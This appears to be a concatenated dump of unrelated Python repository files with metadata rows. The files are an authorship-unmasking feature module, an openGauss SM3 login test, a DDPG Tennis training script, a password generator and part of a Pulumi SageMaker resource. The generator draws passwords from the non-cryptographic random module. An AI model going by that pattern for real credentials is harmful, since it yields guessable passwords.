from authorship_unmasking.input.tokenizers import WordTokenizer, CharNgramTokenizer, DisjunctCharNgramTokenizer
from authorship_unmasking.util.util import lru_cache
from copy import deepcopy
import numpy
from math import ceil
from nltk import FreqDist
from typing import List, Iterable
class MetaFeatureSet(FeatureSet):
"""
    Feature set combining the features of several sub feature sets into a single
    feature vector of the given length. The vector length allotted to each sub
    feature set follows the configured sub feature proportions.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler)
self._sub_features = [] # type: List[FeatureSet]
self._sub_feature_proportions = [] # type: List[int]
def add_sub_feature(self, feature: FeatureSet):
"""
Add an individual sub feature.
:param feature: feature set to add
"""
self._sub_features.append(feature)
@instance_list_property(delegate_args=True)
def sub_features(self) -> List[FeatureSet]:
""" Get sub features. """
return self._sub_features
@sub_features.setter
def sub_features(self, features: List[FeatureSet]):
""" Set sub features. """
self._sub_features = features
@property
def feature_proportions(self) -> List[int]:
""" Get sub feature proportions. """
return self._sub_feature_proportions
@feature_proportions.setter
def feature_proportions(self, proportions: List[int]):
""" Set sub feature proportions. """
self._sub_feature_proportions = proportions
def _get_features(self, n, func) -> Iterable[numpy.ndarray]:
sum_weights = sum(self._sub_feature_proportions)
proportions = numpy.concatenate((self._sub_feature_proportions,
numpy.ones(len(self._sub_features) - len(self._sub_feature_proportions))))
proportions = [ceil(n * w / sum_weights) for w in proportions]
return numpy.concatenate([list(getattr(f, func)(proportions[i]))
for i, f in enumerate(self._sub_features)], axis=1)
def get_features_absolute(self, n: int) -> Iterable[numpy.ndarray]:
return self._get_features(n, "get_features_absolute")
def get_features_relative(self, n: int) -> Iterable[numpy.ndarray]:
return self._get_features(n, "get_features_relative")
class MultiChunkFeatureSet(MetaFeatureSet):
"""
    Meta feature set to be used with chunks generated by a :class:`MultiChunker`.
The number of sub features of this FeatureSet has to be the same as the number
of sub chunks of the MultiChunker.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler)
self._sub_features_initialized = False
def _get_features(self, n, func) -> Iterable[numpy.ndarray]:
if not self._sub_features_initialized:
for i, feature in enumerate(self._sub_features):
if len(self._sub_features) != len(self.pair.chunks_a[i]) != len(self.pair.chunks_b[i]):
raise ValueError("Number of sub chunks needs to be the same as number of sub features.")
new_pair = deepcopy(self.pair)
new_pair.pair_id = self.pair.pair_id
new_chunks_a = [c[i] for c in new_pair.chunks_a]
new_chunks_b = [c[i] for c in new_pair.chunks_b]
new_pair.replace_chunks(new_chunks_a, new_chunks_b)
feature.pair = new_pair
self._sub_features_initialized = True
return super()._get_features(n, func)
class CachedAvgTokenCountFeatureSet(FeatureSet):
"""
Generic feature set which uses the average frequency counts per chunk of the
tokens generated by a specified tokenizer and caches them in memory.
    By default, the tokenization cache is limited to 200 chunks.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None, chunk_tokenizer: Tokenizer = None):
"""
:param pair: pair of chunked texts
:param sampler: :class:`ChunkSampler` for sampling chunks from ``pair``
:param chunk_tokenizer: tokenizer for tokenizing chunks
"""
super().__init__(pair, sampler)
self._chunk_tokenizer = chunk_tokenizer
self._is_prepared = False
self.__freq_a = None
self.__freq_b = None
self._chunks = []
@instance_property
def chunk_tokenizer(self) -> Tokenizer:
return self._chunk_tokenizer
@chunk_tokenizer.setter
def chunk_tokenizer(self, tokenizer):
self._chunk_tokenizer = tokenizer
@FeatureSet.pair.setter
def pair(self, pair):
self._pair = pair
self._chunks = []
self._is_prepared = False
def _prepare(self):
if self._is_prepared:
return
freq_dist_a = FreqDist()
for a in self._pair.chunks_a:
freq_dist_a.update(self._tokenize(a))
freq_dist_b = FreqDist()
for b in self._pair.chunks_b:
freq_dist_b.update(self._tokenize(b))
self._avg_freq_dist = FreqDist()
n_a = freq_dist_a.N()
n_b = freq_dist_b.N()
for a in freq_dist_a:
self._avg_freq_dist[a] = (freq_dist_a[a] / n_a + freq_dist_b[a] / n_b) / 2.0
for b in freq_dist_b:
if self._avg_freq_dist[b] != 0.0:
continue
self._avg_freq_dist[b] = (freq_dist_a[b] / n_a + freq_dist_b[b] / n_b) / 2.0
self._chunks = self._sampler.generate_chunk_pairs(self._pair)
self.__freq_a = None
self.__freq_b = None
self._is_prepared = True
def get_features_absolute(self, n: int) -> Iterable[numpy.ndarray]:
self._prepare()
top_n_words = numpy.array([w for (w, f) in self._avg_freq_dist.most_common(n)])
num_top_words = len(top_n_words)
for c in self._chunks:
vec = numpy.zeros(2 * n)
self.__freq_a = FreqDist(self._tokenize(c[0]))
for i in range(0, n):
if i >= num_top_words:
break
vec[i] = self.__freq_a[top_n_words[i]]
self.__freq_b = FreqDist(self._tokenize(c[1]))
for i in range(n, 2 * n):
if i >= num_top_words + n:
break
vec[i] = self.__freq_b[top_n_words[i - n]]
yield vec
def get_features_relative(self, n: int) -> Iterable[numpy.ndarray]:
features = self.get_features_absolute(n)
for vec in features:
n_a = self.__freq_a.N()
for i in range(0, n):
vec[i] /= n_a
n_b = self.__freq_b.N()
for i in range(n, 2 * n):
vec[i] /= n_b
yield vec
@lru_cache(maxsize=200)
def _tokenize(self, text) -> List[str]:
return list(self._chunk_tokenizer.tokenize(text))
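# Worked example (illustrative only): if a token occurs 4 times among the 100 tokens of
# chunk set A and once among the 50 tokens of chunk set B, _prepare() stores
# (4 / 100 + 1 / 50) / 2 = 0.03 for it in _avg_freq_dist, and most_common(n) ranks the
# top-n tokens by exactly this averaged relative frequency.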
class AvgWordFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the n most
frequent words in both input chunk sets.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
super().__init__(pair, sampler, WordTokenizer())
class AvgCharNgramFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the k most
frequent character n-grams in both input chunk sets.
Default n-gram order is 3.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
self.__tokenizer = CharNgramTokenizer(3)
super().__init__(pair, sampler, self.__tokenizer)
@property
def order(self) -> int:
""" Get n-gram order. """
return self.__tokenizer.order
@order.setter
def order(self, ngram_order: int):
""" Set n-gram order. """
self.__tokenizer.order = ngram_order
class AvgDisjunctCharNgramFreqFeatureSet(CachedAvgTokenCountFeatureSet):
"""
Feature set using the average frequencies of the k most
frequent character n-grams in both input chunk sets.
Default n-gram order is 3.
"""
def __init__(self, pair: SamplePair = None, sampler: ChunkSampler = None):
self.__tokenizer = DisjunctCharNgramTokenizer(3)
super().__init__(pair, sampler, self.__tokenizer)
@property
def order(self) -> int:
""" Get n-gram order. """
return self.__tokenizer.order
@order.setter
def order(self, ngram_order: int):
""" Set n-gram order. """
self.__tokenizer.order = ngram_order
| 35.297794
| 114
| 0.64962
|
c1de1ae660665c2bac52cb29fbace23b5ff843c0
| 7,749
|
py
|
Python
|
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/SECURITY/ENCRYPTED/Opengauss_Function_Security_SM3_Case0048.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : security_sm3
Case Name   : When a user is created with password encryption algorithm MD5 and the sm3
              authentication method, a non-initial user connects to the database through
              JDBC with the correct password
Description :
    1. Set password_encryption_type=0
    2. Change the authentication method to sm3 in pg_hba.conf
    3. Log in to the database through JDBC as the non-initial user with the correct password
Expect      :
    1-2. Parameters are set successfully
    3. The database connection fails
History :
"""
import os
import unittest
from yat.test import Node
from yat.test import macro
from testcase.utils.Common import Common
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Logger import Logger
class Security(unittest.TestCase):
def setUp(self):
self.logger = Logger()
self.logger.info('--Opengauss_Function_Security_sm3_Case0048 start--')
self.userNode = Node('PrimaryDbUser')
self.primary_root = Node('PrimaryRoot')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.DB_INSTANCE_PATH = macro.DB_INSTANCE_PATH
self.sh_primy = CommonSH('PrimaryDbUser')
self.common = Common()
self.user = 'u_security_sm3_0048'
self.targetpath = "/home/jdbc_test"
self.properties = os.path.join(self.targetpath, "jdbc_connect.conf")
self.java_name = "jdbc_drop_schema_case0001"
self.script_name = 'bcprov-jdk15on-1.68'
self.config = os.path.join(self.DB_INSTANCE_PATH, 'pg_hba.conf')
self.confignew = os.path.join(self.DB_INSTANCE_PATH, 'pg_hba_bak.conf')
        self.logger.info('--------Get the parameter default value--------')
self.default_msg_list = ''
check_default = 'show password_encryption_type;'
default_msg = self.sh_primy.execut_db_sql(check_default)
self.logger.info(default_msg)
self.default_msg_list = default_msg.splitlines()[2].strip()
self.logger.info(self.default_msg_list)
        self.logger.info('--------Back up the pg_hba.conf whitelist file---------')
cp_cmd = f"cp {self.config} {self.confignew}"
self.userNode.sh(cp_cmd).result()
def test_encrypted(self):
        text = '---step1: set password_encryption_type=0; expect: success---'
self.logger.info(text)
exe_cmd1 = f'source {self.DB_ENV_PATH};' \
f'gs_guc reload -D {self.DB_INSTANCE_PATH} -c ' \
'"password_encryption_type=0"'
msg1 = self.userNode.sh(exe_cmd1).result()
self.logger.info(msg1)
check_cmd = 'show password_encryption_type;'
check_msg = self.sh_primy.execut_db_sql(check_cmd)
self.logger.info(check_msg)
self.common.equal_sql_mdg(check_msg, 'password_encryption_type', '0',
'(1 row)', flag='1')
        text = '---step2: add the sm3 authentication entry to pg_hba.conf; expect: success---'
self.logger.info(text)
exe_cmd2 = f'grep "IPv4 local connections:" {self.config}'
msg2 = self.userNode.sh(exe_cmd2).result()
self.logger.info(msg2)
insert_messages = f"host {self.userNode.db_name} {self.user} " \
f"{self.userNode.db_host}/32 sm3"
exe_cmd3 = f'sed -i "/{msg2}/a\{insert_messages}" {self.config}'
self.logger.info(exe_cmd3)
msg3 = self.userNode.sh(exe_cmd3).result()
self.logger.info(msg3)
restart_cmd = f'source {macro.DB_ENV_PATH};' \
f'gs_ctl restart -D {macro.DB_INSTANCE_PATH} -M primary'
restart_msg = self.userNode.sh(restart_cmd).result()
self.logger.info(restart_msg)
        text = '---step3: create user 1; expect: success---'
self.logger.info(text)
sql_cmd4 = f'create user {self.user} with password \'' \
f'{macro.COMMON_PASSWD}\';'
msg4 = self.sh_primy.execut_db_sql(sql_cmd4)
self.logger.info(msg4)
        self.assertIn('CREATE ROLE', msg4, 'Execution failed: ' + text)
        text = '---step4.1: write the JDBC config file with the correct password for user 1; expect: success---'
self.logger.info(text)
self.common.scp_file(self.primary_root,
f"{self.java_name}.java", self.targetpath)
self.common.scp_file(self.primary_root,
f"{self.script_name}.jar", self.targetpath)
result = self.primary_root.sh(
f"touch {self.properties}").result()
self.logger.info(result)
config = f'echo "password={macro.COMMON_PASSWD}"> {self.properties}'
self.primary_root.sh(config)
config = f'echo "port={self.userNode.db_port}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'echo "hostname={self.userNode.db_host}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'echo "user={self.user}">> {self.properties}'
self.primary_root.sh(config)
config = f'echo "dbname={self.userNode.db_name}">> ' \
f'{self.properties}'
self.primary_root.sh(config)
config = f'cat {self.properties}'
result = self.primary_root.sh(config).result()
assert1 = "password=" in result and "port=" in result and \
"hostname=" in result and "user=" in result and \
"dbname=" in result
        self.assertTrue(assert1, 'Execution failed: ' + text)
        text = '---step4.2: compile the java script; expect: success---'
self.logger.info(text)
scp_cmd = self.primary_root.scp_put(macro.JDBC_PATH,
f"{self.targetpath}/postgresql.jar")
self.logger.info(scp_cmd)
cmd = f"javac -encoding utf-8 -cp " \
f"{os.path.join(self.targetpath, 'postgresql.jar')} " \
f"{os.path.join(self.targetpath, f'{self.java_name}.java')}"
self.logger.info(cmd)
result = self.primary_root.sh(cmd).result()
self.logger.info(result)
        text = '---step4.3: run the java script; expect: the database connection fails---'
self.logger.info(text)
cmd = f"java -cp {os.path.join(self.targetpath, 'postgresql.jar')}:" \
f"{os.path.join(self.targetpath, f'{self.script_name}.jar')}:" \
f"{self.targetpath} {self.java_name} -F" \
f" {self.properties}"
result = self.primary_root.sh(cmd).result()
self.logger.info(result)
        self.assertIn('连接失败', result, 'Execution failed: ' + text)  # '连接失败' means "connection failed" in the JDBC tool output
def tearDown(self):
        self.logger.info('-------1. Restore the configuration file------')
check_cmd = f'if [ -f {self.config} ];then mv {self.confignew} ' \
f'{self.config};rm -rf {self.targetpath};fi'
self.logger.info(check_cmd)
self.primary_root.sh(check_cmd).result()
restart_cmd = f'source {macro.DB_ENV_PATH};' \
f'gs_ctl restart -D {macro.DB_INSTANCE_PATH} -M primary'
restart_msg = self.userNode.sh(restart_cmd).result()
self.logger.info(restart_msg)
        self.logger.info('-------2. Restore the password encryption configuration------')
exe_cmd2 = f'source {self.DB_ENV_PATH};' \
f'gs_guc reload -D {self.DB_INSTANCE_PATH} -c ' \
f'"password_encryption_type={self.default_msg_list}"'
msg2 = self.userNode.sh(exe_cmd2).result()
self.logger.info(msg2)
sql_cmd3 = 'show password_encryption_type;'
msg3 = self.sh_primy.execut_db_sql(sql_cmd3)
self.logger.info(msg3)
        self.logger.info('-------3. Drop the user-------')
sql_cmd4 = f'drop user {self.user}'
msg4 = self.sh_primy.execut_db_sql(sql_cmd4)
self.logger.info(msg4)
self.logger.info('--Opengauss_Function_Security_sm3_Case0048 finish--')
| 45.052326
| 84
| 0.623048
|
c4a6fc5dcfbae868a35b2a748dbf49a03120974f
| 5,852
|
py
|
Python
|
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
p3_collab_compet/main.py
|
guillecg/drlnd
|
b2d8fda6b90efbf1ca9b5ad98a504debb59a10ef
|
[
"MIT"
] | null | null | null |
import datetime
from pathlib import Path
import numpy as np
import torch
from collections import deque
import matplotlib.pyplot as plt
from unityagents import UnityEnvironment
from p3_collab_compet.agents.agent_ddpg import AgentDDPG
SEED = 42
SCORE_TARGET = 0.5
SCORE_WINDOW = 100
DEVICE = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
# Set seeds
torch.manual_seed(SEED)
np.random.seed(SEED)
# create folder architecture
PROJECT = 'p3_collab_compet'
START_TIME = datetime.datetime.now().strftime('%m-%d-%Y_%Hh%Mm')
EXPERIMENT_FOLDER = f'{PROJECT}/experiments/{START_TIME}'
Path(EXPERIMENT_FOLDER).mkdir(parents=True, exist_ok=False)
if __name__ == '__main__':
env_path = f'{PROJECT}/Tennis_Linux/Tennis.x86_64'
env = UnityEnvironment(file_name=env_path)
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
# reset the environment
env_info = env.reset(train_mode=True)[brain_name]
# number of agents
num_agents = len(env_info.agents)
print('Number of agents:', num_agents)
# size of each action
action_size = brain.vector_action_space_size
print('Size of each action:', action_size)
# examine the state space
states = env_info.vector_observations
state_size = states.shape[1]
print(
'There are {} agents. Each observes a state with length: {}'
.format(states.shape[0], state_size)
)
print('The state for the first agent looks like:', states[0])
# define the agent
agent = AgentDDPG(
state_size=state_size,
action_size=action_size,
hyperparams=dict(),
device=DEVICE,
seed=SEED
)
# training hyperparameters
n_episodes = 500 # maximum number of training episodes
max_t = 1000 # maximum number of timesteps per episode
gamma = 0.95
gamma_rate = 0.01
gamma_scale = 1.0 - gamma_rate
gamma_final = 0.99
tau = 0.01
tau_rate = 0.001
tau_scale = 1.0 - tau_rate
tau_final = 0.001
noise_factor = 1.0
noise_scale = 1.0
scores = [] # scores for each episode
scores_window = deque(maxlen=SCORE_WINDOW) # last 100 scores
scores_window_means = [] # average max scores for each episode
# training loop
for i_episode in range(1, n_episodes+1):
env_info = env.reset(train_mode=True)[brain_name] # reset the environment
        states = env_info.vector_observations                   # get the current states
agent.reset() # initialize agents
score = np.zeros(num_agents) # initialize scores
for t in range(max_t):
actions = agent.select_action(states) # get the action from the agent
env_info = env.step(actions)[brain_name] # send the action to the environment
next_states = env_info.vector_observations # get the next state
rewards = env_info.rewards # get the reward
dones = env_info.local_done # see if episode has finished
# save experience tuple (of each agent) into replay buffer
for i_agent in range(0, num_agents):
experience = (
states[i_agent],
actions[i_agent],
rewards[i_agent],
next_states[i_agent],
dones[i_agent]
)
agent.memory.add(data=experience)
states = next_states # roll over states to next time step
score += rewards # update the scores
# Train each agent
agent.learn_batch(timestep=t, gamma=gamma, tau=tau)
if np.any(dones):
break
# Increase gamma discount factor up to gamma_final.
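        # Each episode this closes a fraction gamma_rate (resp. tau_rate) of the remaining
        # gap to the final value, e.g. gamma: 0.95 -> 0.99 - 0.99 * (0.99 - 0.95) = 0.9504.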
gamma = gamma_final - gamma_scale * (gamma_final - gamma)
tau = tau_final - tau_scale * (tau_final - tau)
noise_scale *= noise_factor
# By problem definition, the score is the max of both agents
score = np.max(score)
scores.append(score)
scores_window.append(score)
window_score_mean = np.mean(scores_window) # save mean of window scores
scores_window_means.append(window_score_mean)
print(
'\rEpisode {}\tEpisode total score: {:.2f}\tWindow Score: {:.2f}'
.format(i_episode, score, window_score_mean),
end=""
)
if i_episode % 100 == 0:
print(
'\rEpisode {}\tWindow Score: {:.2f}'
.format(i_episode, window_score_mean)
)
if window_score_mean >= SCORE_TARGET:
print(
'\nEnvironment solved in {:d} episodes!\tWindow Score: {:.2f}'
.format(i_episode, window_score_mean)
)
print(f'Saving weights into {EXPERIMENT_FOLDER} folder...')
torch.save(
agent.actor_local.state_dict(),
f'{EXPERIMENT_FOLDER}/weights_actor_episode_{i_episode}.pth'
)
torch.save(
agent.critic_local.state_dict(),
f'{EXPERIMENT_FOLDER}/weights_critic_episode_{i_episode}.pth'
)
break
# plot the scores
fig = plt.figure()
ax = fig.add_subplot(111)
plt.plot(np.arange(1, len(scores) + 1), scores, label='Episode scores')
plt.plot(np.arange(1, len(scores) + 1), scores_window_means, label='Window mean')
plt.legend()
plt.ylabel('Score')
plt.xlabel('Episode #')
plt.show()
# save figure to file
print(f'Saving figure into {EXPERIMENT_FOLDER} folder...')
fig.savefig(f'{EXPERIMENT_FOLDER}/scores.png')
# close the environment
env.close()
| 31.462366
| 92
| 0.605605
|
ea603057790d51b912276c59fb205d40a1c85044
| 356
|
py
|
Python
|
_common/helper/tests/test_wrappers.py
|
terratenney/aws-tools
|
d8ca07d56d812deb819b039752b94a0f1b9e6eb2
|
[
"MIT"
] | 8
|
2020-12-27T18:44:17.000Z
|
2022-03-10T22:20:28.000Z
|
_common/helper/tests/test_wrappers.py
|
terratenney/aws-tools
|
d8ca07d56d812deb819b039752b94a0f1b9e6eb2
|
[
"MIT"
] | 28
|
2020-08-30T02:57:03.000Z
|
2021-05-12T09:13:15.000Z
|
_common/helper/tests/test_wrappers.py
|
kyhau/arki
|
b5d6b160ef0780032f231362158dd9dd892f4e8e
|
[
"MIT"
] | 8
|
2020-09-03T19:00:13.000Z
|
2022-03-31T05:31:35.000Z
|
import logging
from helper.wrappers import init_wrapper
@init_wrapper
def process(*args, **kwargs):
logging.debug("At function process()")
assert kwargs.get("data") == [1, 2, 3]
return 12345
def test_init_wrapper_succeeded():
assert process(data=[1, 2, 3]) == 12345
def test_init_wrapper_failed():
assert process(data=[1, 2]) == 1
| 20.941176
| 43
| 0.688202
|
2c343f8c0bedec1a417a6c18e4510afce6dcefd4
| 1,265
|
py
|
Python
|
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
passgen.py
|
linuxg33k76/passgen
|
6af46b1ab6cc3af2b083f6e85618ab16fc06bb52
|
[
"MIT"
] | null | null | null |
#!/bin/env python3
'''
CLI Password Generator
By Ben Calvert
Date: 6/1/2021
'''
import random
# Get user input on length
def get_input():
while True:
x = input('Please enter length of password: ')
try:
if int(x) and int(x) > 0:
return int(x)
except:
print('Invalid Input; Try again!')
def main():
# Set Constants
UPPER = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    LOWER = 'abcdefghijklmnopqrstuvwxyz'
NUMBER = '0123456789'
SYMBOLS = '!@#$%&*.?'
# Combine all Constants
all_values = UPPER + LOWER + NUMBER + SYMBOLS
    # Get the desired password length from the user
password_length = get_input()
# Find a random sample and generate password of specified length - values can repeat
password_array = []
for i in range(password_length):
# Creates an array of one value
value = random.sample(all_values,1)
# Add value of array above to a new array
password_array.append(value[0])
# make the array a string
password = ''.join([str(character) for character in password_array])
# Print generated password
print('\n\t' + password + '\n')
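

# A minimal sketch of a cryptographically stronger variant (an addition for illustration,
# not part of the original script): random.sample() draws from a non-cryptographic PRNG,
# whereas secrets.choice() uses the operating system's CSPRNG.
def generate_secure_password(length, alphabet):
    """Return `length` characters drawn uniformly (with replacement) from `alphabet`."""
    import secrets
    return ''.join(secrets.choice(alphabet) for _ in range(length))
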
if __name__ == '__main__':
main()
| 22.589286
| 88
| 0.624506
|
182b02b14e9481648c89c72560c5df711327246f
| 38,958
|
py
|
Python
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 260
|
2018-06-18T14:57:00.000Z
|
2022-03-29T11:41:03.000Z
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 1,154
|
2018-06-19T20:38:20.000Z
|
2022-03-31T19:48:16.000Z
|
sdk/python/pulumi_aws/sagemaker/flow_definition.py
|
rapzo/pulumi-aws
|
390a098221315d98a54ba97d1559e750dc3053b7
|
[
"ECL-2.0",
"Apache-2.0"
] | 115
|
2018-06-28T03:20:27.000Z
|
2022-03-29T11:41:06.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['FlowDefinitionArgs', 'FlowDefinition']
@pulumi.input_type
class FlowDefinitionArgs:
def __init__(__self__, *,
flow_definition_name: pulumi.Input[str],
human_loop_config: pulumi.Input['FlowDefinitionHumanLoopConfigArgs'],
output_config: pulumi.Input['FlowDefinitionOutputConfigArgs'],
role_arn: pulumi.Input[str],
human_loop_activation_config: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']] = None,
human_loop_request_source: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a FlowDefinition resource.
:param pulumi.Input[str] flow_definition_name: The name of your flow definition.
:param pulumi.Input['FlowDefinitionHumanLoopConfigArgs'] human_loop_config: An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
:param pulumi.Input['FlowDefinitionOutputConfigArgs'] output_config: An object containing information about where the human review results will be uploaded. See Output Config details below.
:param pulumi.Input[str] role_arn: The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
:param pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs'] human_loop_activation_config: An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
:param pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs'] human_loop_request_source: Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
pulumi.set(__self__, "flow_definition_name", flow_definition_name)
pulumi.set(__self__, "human_loop_config", human_loop_config)
pulumi.set(__self__, "output_config", output_config)
pulumi.set(__self__, "role_arn", role_arn)
if human_loop_activation_config is not None:
pulumi.set(__self__, "human_loop_activation_config", human_loop_activation_config)
if human_loop_request_source is not None:
pulumi.set(__self__, "human_loop_request_source", human_loop_request_source)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="flowDefinitionName")
def flow_definition_name(self) -> pulumi.Input[str]:
"""
The name of your flow definition.
"""
return pulumi.get(self, "flow_definition_name")
@flow_definition_name.setter
def flow_definition_name(self, value: pulumi.Input[str]):
pulumi.set(self, "flow_definition_name", value)
@property
@pulumi.getter(name="humanLoopConfig")
def human_loop_config(self) -> pulumi.Input['FlowDefinitionHumanLoopConfigArgs']:
"""
An object containing information about the tasks the human reviewers will perform. See Human Loop Config details below.
"""
return pulumi.get(self, "human_loop_config")
@human_loop_config.setter
def human_loop_config(self, value: pulumi.Input['FlowDefinitionHumanLoopConfigArgs']):
pulumi.set(self, "human_loop_config", value)
@property
@pulumi.getter(name="outputConfig")
def output_config(self) -> pulumi.Input['FlowDefinitionOutputConfigArgs']:
"""
An object containing information about where the human review results will be uploaded. See Output Config details below.
"""
return pulumi.get(self, "output_config")
@output_config.setter
def output_config(self, value: pulumi.Input['FlowDefinitionOutputConfigArgs']):
pulumi.set(self, "output_config", value)
@property
@pulumi.getter(name="roleArn")
def role_arn(self) -> pulumi.Input[str]:
"""
The Amazon Resource Name (ARN) of the role needed to call other services on your behalf.
"""
return pulumi.get(self, "role_arn")
@role_arn.setter
def role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "role_arn", value)
@property
@pulumi.getter(name="humanLoopActivationConfig")
def human_loop_activation_config(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]:
"""
An object containing information about the events that trigger a human workflow. See Human Loop Activation Config details below.
"""
return pulumi.get(self, "human_loop_activation_config")
@human_loop_activation_config.setter
def human_loop_activation_config(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']]):
pulumi.set(self, "human_loop_activation_config", value)
@property
@pulumi.getter(name="humanLoopRequestSource")
def human_loop_request_source(self) -> Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]:
"""
Container for configuring the source of human task requests. Use to specify if Amazon Rekognition or Amazon Textract is used as an integration source. See Human Loop Request Source details below.
"""
return pulumi.get(self, "human_loop_request_source")
@human_loop_request_source.setter
def human_loop_request_source(self, value: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']]):
pulumi.set(self, "human_loop_request_source", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the resource. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@pulumi.input_type
class _FlowDefinitionState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
flow_definition_name: Optional[pulumi.Input[str]] = None,
human_loop_activation_config: Optional[pulumi.Input['FlowDefinitionHumanLoopActivationConfigArgs']] = None,
human_loop_config: Optional[pulumi.Input['FlowDefinitionHumanLoopConfigArgs']] = None,
human_loop_request_source: Optional[pulumi.Input['FlowDefinitionHumanLoopRequestSourceArgs']] = None,
output_config: Optional[pulumi.Input['FlowDefinitionOutputConfigArgs']] = None,
role_arn: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
